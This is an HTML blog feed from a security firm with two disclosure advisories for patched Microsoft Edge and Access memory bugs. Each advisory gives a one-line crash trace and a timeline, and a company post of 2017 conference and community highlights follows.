<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">CVE Number: </span></b><span style="background-color: transparent; font-family: "arial" , "helvetica" , sans-serif;">CVE-2018-0839</span><br />
<br /></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Summary</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.</span><br />
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="western" style="background-color: white; line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b>Details and crash information</b></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">edgehtml!Ordinal125+0xe3c86:</span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">5ef196d6 8b5928 mov ebx,dword ptr [ecx+28h] ds:0023:117cd008=????????</span></div>
<div class="western" style="background-color: white; line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<br /></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Microsoft</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Product: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Edge</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Version: </span></b><span style="background-color: #fffbf7; font-family: "arial" , "helvetica" , sans-serif;">11.0.15063.67</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor URLs:</span></b></div>
<ul>
<li><span style="background-color: white; color: blue; display: inline; font-family: "arial" , "helvetica" , sans-serif; outline: none; text-align: justify; transition: 0.3s;"><a href="https://www.microsoft.com/">https://www.microsoft.com</a></span></li>
<li><span style="background-color: white; color: blue; display: inline; font-family: "arial" , "helvetica" , sans-serif; outline: none; text-align: justify; transition: 0.3s;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0839">https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0839</a></span></li>
<li><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.zerodayinitiative.com/advisories/ZDI-18-167/">https://www.zerodayinitiative.com/advisories/ZDI-18-167/</a></span></li>
</ul>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Vendor Response</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; text-align: justify;">The vendor has patched the vulnerability and released a new version.</span><br />
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Disclosure Timeline</span></b></div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">23-11-2017 – Initial Discovery</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">29-11-2017 – ZDI Notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">07-12-2017 – Vendor Notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">21-02-2018 – Coordinated public release of advisory</span></li>
</ul>
<div>
<b style="background-color: white; text-align: justify;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Credit</span></b></div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif; text-align: justify;">This vulnerability was discovered by Dmitri Kaslov of Telspace Systems</span><br />
<br />Posted by Anonymous (noreply@blogger.com)<br />
<br />Telspace Systems Security Advisory (TSA-2018-001) (published 2018-02-28T11:30:00.000+02:00, updated 2018-02-28T11:30:36.458+02:00)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoArf3zp44IvVhTABqzSqd-Hyiy8jE06LErpSB2BKnlc321lc-nu94a2by0uMhjNL87Dk-Vnno2j5suO2CVkdIzaO9RBAN0N52pjgHZ8qdfcxLIisgbv40LFJzAspyu71FJLxpLFoil2Bd/s1600/Telspace.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" data-original-height="467" data-original-width="761" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoArf3zp44IvVhTABqzSqd-Hyiy8jE06LErpSB2BKnlc321lc-nu94a2by0uMhjNL87Dk-Vnno2j5suO2CVkdIzaO9RBAN0N52pjgHZ8qdfcxLIisgbv40LFJzAspyu71FJLxpLFoil2Bd/s320/Telspace.jpg" width="320" /></span></a></div>
<div class="article-content entry-content" itemprop="articleBody" style="clear: both; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px; text-align: justify;">
<div class="article-content entry-content" itemprop="articleBody" style="clear: both; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px;">
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<h2 style="text-align: center;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Security Advisory</span></b></h2>
<div style="text-align: center;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
</div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><b>TSA-2018-001: </b>Microsoft Access Information Disclosure Vulnerability</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">CVE Number: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">CVE-2018-0853</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Summary</span></b></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">An information disclosure vulnerability exists when Microsoft Office Access software reads out-of-bounds memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out-of-bounds memory.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="western" style="line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;">Details and crash information</b></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;"><br /></b></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">VCRUNTIME140!memcpy+0x4e:</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white;">72edd1ce f3a4 rep movs byte ptr es:[edi],byte ptr [esi]</span></span><br />
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white;"><br /></b></span></div>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Microsoft</span><br />
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Product: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">Access</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Version: </span></b><span style="font-family: "arial" , "helvetica" , sans-serif;">16.0.8625.2127</span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor URLs:</span></b></div>
<br />
<ul>
<li><a href="https://www.microsoft.com/"><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;">https://www.microsoft.com</span></a></li>
<li><a href="https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0853"><span style="color: blue; font-family: "arial" , "helvetica" , sans-serif;">https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0853</span></a></li>
</ul>
<br />
<div class="western" style="line-height: 0.42cm; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<br /></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Vendor Response</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">The vendor has patched the vulnerability and released a new version.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Disclosure Timeline</span></b></div>
<br />
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">23-11-2017 – Initial Discovery</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">25-11-2017 – Vendor Notification</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">19-01-2018 – Vendor Patch</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">13-02-2018 – Public Disclosure</span></li>
</ul>
<br />
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<br /></div>
<div class="western" style="line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px;">
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;">Credit</span></b><br />
<b><span style="background-color: white; font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">This vulnerability was discovered by Dmitri Kaslov of Telspace Systems</span></div>
</div>
<br />Posted by Anonymous (noreply@blogger.com)<br />
<br />2017 Highlights, a great year and even greater things to come! (published 2018-01-10T14:10:00.000+02:00, updated 2018-01-10T14:10:32.559+02:00)<br />
<br />As we enter a new year, Telspace would like to look back on 2017 and thank everyone who made 2017 one of our greatest yet. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. 2017 saw growth in the Telspace Team, in particular in our Research and Development space (more to come!). This blog post provides an overview of some of the highlights this year. If we have missed anything, let us know in the comments below! We kicked the year off by joining up with Carte Blanche to provide comment on mobile privacy and the tools used to spy on people.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c4mYel7R5XPgj4mQlTlgG1mCZxRaxMycS0_nrCVmj2AYjUkBCdD4uQd5x068WhCTL5PpzAiSVHs7VnG1E-Ge7C7_JRW-QF0sYZPiv98MH-aNSrLfibf2jd6H07M7Xu8sYK4LWm_c3MeC/s1600/1.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c4mYel7R5XPgj4mQlTlgG1mCZxRaxMycS0_nrCVmj2AYjUkBCdD4uQd5x068WhCTL5PpzAiSVHs7VnG1E-Ge7C7_JRW-QF0sYZPiv98MH-aNSrLfibf2jd6H07M7Xu8sYK4LWm_c3MeC/s1600/1.png" /></a><br /><span style="font-size: x-small;">Left to right: Stieler (Standard Bank), Bongani Bingwa (Carte Blanche), Simphiwe (PIC), Dino Covotsos (Telspace Systems)</span><br /><br /> Telspace has always been very close to the local infosec community and we believe in giving back. As part of this, Telspace got heavily involved in ITWeb’s first Hackathon, where we provided our time to train, mentor and judge the participants. The inaugural Hackathon brought together young professionals with an interest in developing their skills in Information Security. 
The overall theme, “Innovation in Security”, challenged disruptive innovators to build the most secure systems possible, as well as to explore new innovative mechanisms for the industry.<br /><br />The Hackathon was a great event and initiative, as it made the participants aware of the importance of information security. Telspace also took on board the Hackathon participant who demonstrated the most passion. As we always like to say, we can teach you skills but we can’t teach you passion!<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-XVBv6n1LD24nPqpL3GDpK4BcKta8Jkb9p4y8Zb6vL1PZNtGS3XRQ6Y8eqcCyAe5gxm00irAWEjZ_34Nx5RQt0HA02j1hlcVhf5LPQLElWgcbBZjTBpRWBBLa39ox3m87bYaKVGYFyVs/s1600/2.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-XVBv6n1LD24nPqpL3GDpK4BcKta8Jkb9p4y8Zb6vL1PZNtGS3XRQ6Y8eqcCyAe5gxm00irAWEjZ_34Nx5RQt0HA02j1hlcVhf5LPQLElWgcbBZjTBpRWBBLa39ox3m87bYaKVGYFyVs/s400/2.png" /></a><br /><span style="font-size: x-small;">Left to right: Manny Corregedor (COO of Telspace Systems), Nithen Naidoo (CEO of Snode) at the Hackathon Ideathon</span><br /><br />For more information on the Hackathon go to:<br /><ul>
<li><a href="https://www.itweb.co.za/content/lP3gQ2qGr8LMnRD1">https://www.itweb.co.za/content/lP3gQ2qGr8LMnRD1</a> </li>
<li><a href="http://v2.itweb.co.za/event/itweb/security-summit-2017/?page=hackathon">http://v2.itweb.co.za/event/itweb/security-summit-2017/?page=hackathon</a> </li>
<li><a href="https://www.itweb.co.za/content/p6GxRKqYe6qb3Wjr">https://www.itweb.co.za/content/p6GxRKqYe6qb3Wjr</a></li>
</ul>
In addition to supporting the ITWeb Hackathon, we also sponsored the ITWeb Security Summit, where we provided training (ethical and wireless hacking) and spoke. We also got the opportunity to catch up with some old friends such as Jayson Street, an international speaker who gave a keynote at the conference. We also made a donation to CANSA for every Telspace shirt that was given away to attendees who visited our stand.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1mo2BZO_zAZCGg4uK3POHXtVWt4Rhz6GenwSBGFhMbZIYsJG5ngHovHqNGeUr8r4xnVqUmbQab7yq4VpOg3WrSqEXQTAbiYCJu_8d2_crwO7Hz2z-o3xZL6FLAewd1RuvpHIIsmwlhF_0/s1600/3.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1mo2BZO_zAZCGg4uK3POHXtVWt4Rhz6GenwSBGFhMbZIYsJG5ngHovHqNGeUr8r4xnVqUmbQab7yq4VpOg3WrSqEXQTAbiYCJu_8d2_crwO7Hz2z-o3xZL6FLAewd1RuvpHIIsmwlhF_0/s640/3.png" /></a><br /><span style="font-size: x-small;">Left to right: Eric Lundberg, Manny Corregedor and Jayson Street</span><br /><br /><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP8Yy_M9bLdyvsAKcW7rf9vwKT6UTp3I6P-TQ6jX7WQXb4zRYpnenunpvz2JMJ6KhrOdkLVptOcBnxR9_cif-GAe3mcsPIr9_vLQUZtTNYy1dVj6TIi3d7XqDKsZVAFCtgp2YQ5Y6n1D/s640/4.png" /><br /><span style="font-size: x-small;">Manny Corregedor giving a talk on ‘A false sense of information security’ at the ITWeb Security Summit. </span><br /><br />The conference was well attended and had great international speakers such as Jayson Street and Mati Aharoni, who gave keynotes.<br /><br />Telspace also attended the first local Johannesburg 0xCon conference, where our COO Manny Corregedor presented his talk “Breaking AVs for fun and the greater good”. 
A great day was had by everyone and it was great seeing the community come together for this local conference.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeNHwFnreeGgt-Ek6lNEd8RkcnvREhBOX2AB-frwpzbijFGb9n1-LBudfqpnIvhhSQFFgXg6kCeD4RDfaNQtwpuzDuRUq8mu0bvS3Y-3got5yLl-hl7qGyBfZFLr4xM-GQhnRBGqvzP3Kz/s1600/5.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeNHwFnreeGgt-Ek6lNEd8RkcnvREhBOX2AB-frwpzbijFGb9n1-LBudfqpnIvhhSQFFgXg6kCeD4RDfaNQtwpuzDuRUq8mu0bvS3Y-3got5yLl-hl7qGyBfZFLr4xM-GQhnRBGqvzP3Kz/s640/5.png" /></a><br /><span style="font-size: x-small;">Left to right (front): Manny, Mariska (No longer with Telspace), Sibusiso, Mark, Richard. Back: Eric.</span><br /><br />Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.<br /><br />In addition to supporting local events, we also attended Blackhat, Defcon 25 and Bsides in Las Vegas. Our analyst Richard Hocking gave a presentation on Hacking Stock Markets at BSides Las Vegas titled ‘(In)Outsider Trading - Hacking stocks using public information and influence.’<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaobigqr8pKczjv4e55X5QIZ3pmiDFR49IWMQ60LeHbUfYMPZSVKsxKmPfCiIiABPsfr0AepqXjxZKT3l9M3Cng3_pWbmU2WgjpZcrBu6zK5-JsGTgpr9D70w1XrD09bLv1zp32YpxE2Qu/s1600/6.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaobigqr8pKczjv4e55X5QIZ3pmiDFR49IWMQ60LeHbUfYMPZSVKsxKmPfCiIiABPsfr0AepqXjxZKT3l9M3Cng3_pWbmU2WgjpZcrBu6zK5-JsGTgpr9D70w1XrD09bLv1zp32YpxE2Qu/s640/6.png" /></a><br />In Vegas many bonds were made and many beers were enjoyed. We look forward to attending again in 2018. We also donated to the fantastic Hackers for Charity, which is an amazing initiative which we fully support (Thanks Johnny!). 
More information on this great initiative can be found by going to: <a href="http://www.hackersforcharity.org/">http://www.hackersforcharity.org/</a> .<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwiTcdFkJVwcsyfATvBdDq84zB4G_u1Mqab-RkHV8nz4SbZpn47CKX1PV_RZ596rDekLCKQ4oHleEOeuLOsl8wqV0mYrOAp21ExMfWjoVLbUiwSY2iYNHQQiQ9gn3rm6eArvtMfh8S971/s1600/7.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwiTcdFkJVwcsyfATvBdDq84zB4G_u1Mqab-RkHV8nz4SbZpn47CKX1PV_RZ596rDekLCKQ4oHleEOeuLOsl8wqV0mYrOAp21ExMfWjoVLbUiwSY2iYNHQQiQ9gn3rm6eArvtMfh8S971/s640/7.png" /></a><br />Telspace also sponsored and presented at Bsides Cape Town 2017, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG). Our analyst Frank Allenby also presented his talk titled ‘Breach huffing; a culinary exploration of data breaches’.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqKhSw1ljMO_-O5kbBhK2OUj5i9-uGlrN77of3u4T-YxnvXVCt_h96M1L0SyCGC74P2SnY8IQqnkoFyEUD2fCGVl5BEb0R9naxJ78U1c7ctU_YR2SazTyeSdLQcEq4niTa84sFC8Jjxrr/s1600/8.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqKhSw1ljMO_-O5kbBhK2OUj5i9-uGlrN77of3u4T-YxnvXVCt_h96M1L0SyCGC74P2SnY8IQqnkoFyEUD2fCGVl5BEb0R9naxJ78U1c7ctU_YR2SazTyeSdLQcEq4niTa84sFC8Jjxrr/s640/8.png" /></a><br /><span style="font-size: x-small;">Frank Allenby speaking at Bsides Cape Town</span><br /><br />Our analyst Charlie Smith also won the capture the flag competition at BSides Cape Town; the prize was a Google Home device, sponsored by NClose Security.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWyOWYO_amAsQEsagSFTLtbgeYJII7MCHMY11tOmarv3ypknB6_lbc91ik4QI1u1t-0nbouZidwWgzyDNG3Vqo4b9BxMmUXyONQl3MxkdomTKSuJgbz_d0A95PsjCKoPuH958qqEHiHUiO/s1600/9.png"><img border="0" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWyOWYO_amAsQEsagSFTLtbgeYJII7MCHMY11tOmarv3ypknB6_lbc91ik4QI1u1t-0nbouZidwWgzyDNG3Vqo4b9BxMmUXyONQl3MxkdomTKSuJgbz_d0A95PsjCKoPuH958qqEHiHUiO/s640/9.png" /></a><br /><span style="font-size: x-small;">Charlie Smith receiving his prize for winning the CTF at BSides Cape Town</span><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisPQB7oIQgKevutC1h5opLVS_GON3BT3FiNTQjVlHX6oiECf-lzRiGaaJcVBx3vjmDPTLe0XvQQzNilPaIVNwlK0yxgBzw76LkE7GULVzPsmE1Pj3BZ6qDxp4QNt19xv-XBk6JhNq7JDH9/s1600/10.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisPQB7oIQgKevutC1h5opLVS_GON3BT3FiNTQjVlHX6oiECf-lzRiGaaJcVBx3vjmDPTLe0XvQQzNilPaIVNwlK0yxgBzw76LkE7GULVzPsmE1Pj3BZ6qDxp4QNt19xv-XBk6JhNq7JDH9/s640/10.png" /></a><br /><span style="font-size: x-small;">Some “selfies for charity” at BSides Cape Town 2017</span><br /><br />For a complete write-up on our experience at BSides Cape Town, visit:<br /><br /><a href="http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html">http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html</a> <br /><br />This year we officially kicked off our security advisory service, Telspace Security Advisories (TSA), where we responsibly disclosed a number of unknown vulnerabilities (0day) to vendors. In 2018 we plan to continue our research, not only finding unknown vulnerabilities but also releasing research that would be valuable to our clients and, more importantly, the community as a whole - stay tuned :) Lastly, we would like to thank everyone who made our 2017 so amazing: a huge thank you to our staff, clients, friends and, most importantly, the local Information Security community. We wish you all the best and a prosperous year for 2018. <div>
</div>